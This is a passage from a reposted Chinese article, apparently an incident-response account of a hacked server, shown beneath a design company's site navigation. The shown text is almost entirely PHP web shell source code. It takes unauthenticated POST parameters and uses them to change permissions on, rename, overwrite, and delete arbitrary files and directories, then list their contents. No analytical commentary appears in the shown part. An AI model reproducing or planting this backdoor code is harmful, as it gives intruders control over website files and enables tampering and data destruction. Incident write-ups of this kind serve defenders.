经典案例
  • 妙视界
  • 广州市坊森室内装饰有限公司
  • ArtsRouge
  • 香港·维西·创意设计机构
  • 阳春冠军联盟
  • Management
  • 爱艺术咖啡会所

惨遭黑客入侵,记一次服务器被攻击的应急行动!(3)

发布于:2017-12-06 19:02来源:网络整理 作者:jimmoo 点击:

       Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

  •        <input type="hidden" name="path" value="'.$_POST['path'].'">

  •        <input type="hidden" name="opt" value="chmod">

  •        <input type="submit" value="Go" />

  •        </form>';

  •    }elseif($_POST['opt'] == 'rename'){

  •        if(isset($_POST['newname'])){

  •            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

  •                echo '<font color="green">Change Name Done.</font><br />';

  •            }else{

  •                echo '<font color="red">Change Name Error.</font><br />';

  •            }

  •            $_POST['name'] = $_POST['newname'];

  •        }

  •        echo '<form method="POST">

  •        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

  •        <input type="hidden" name="path" value="'.$_POST['path'].'">

  •        <input type="hidden" name="opt" value="rename">

  •        <input type="submit" value="Go" />

  •        </form>';

  •    }elseif($_POST['opt'] == 'edit'){

  •        if(isset($_POST['src'])){

  •            $fp = fopen($_POST['path'],'w');

  •            if(fwrite($fp,$_POST['src'])){

  •                echo '<font color="green">Edit File Done.</font><br />';

  •            }else{

  •                echo '<font color="red">Edit File Error.</font><br />';

  •            }

  •            fclose($fp);

  •        }

  •        echo '<form method="POST">

  •        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

  •        <input type="hidden" name="path" value="'.$_POST['path'].'">

  •        <input type="hidden" name="opt" value="edit">

  •        <input type="submit" value="Go" />

  •        </form>';

  •    }

  •    echo '</center>';

  • }else{

  •    echo '</table><br /><center>';

  •    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

  •        if($_POST['type'] == 'dir'){

  •            if(rmdir($_POST['path'])){

  •                echo '<font color="green">Delete Dir Done.</font><br />';

  •            }else{

  •                echo '<font color="red">Delete Dir Error.</font><br />';

  •            }

  •        }elseif($_POST['type'] == 'file'){

  •            if(unlink($_POST['path'])){

  •                echo '<font color="green">Delete File Done.</font><br />';

  •            }else{

  •                echo '<font color="red">Delete File Error.</font><br />';

  •            }

  •        }

  •    }

  •    echo '</center>';

  •    $scandir = scandir($path);

  • ------分隔线----------------------------
    ------分隔线----------------------------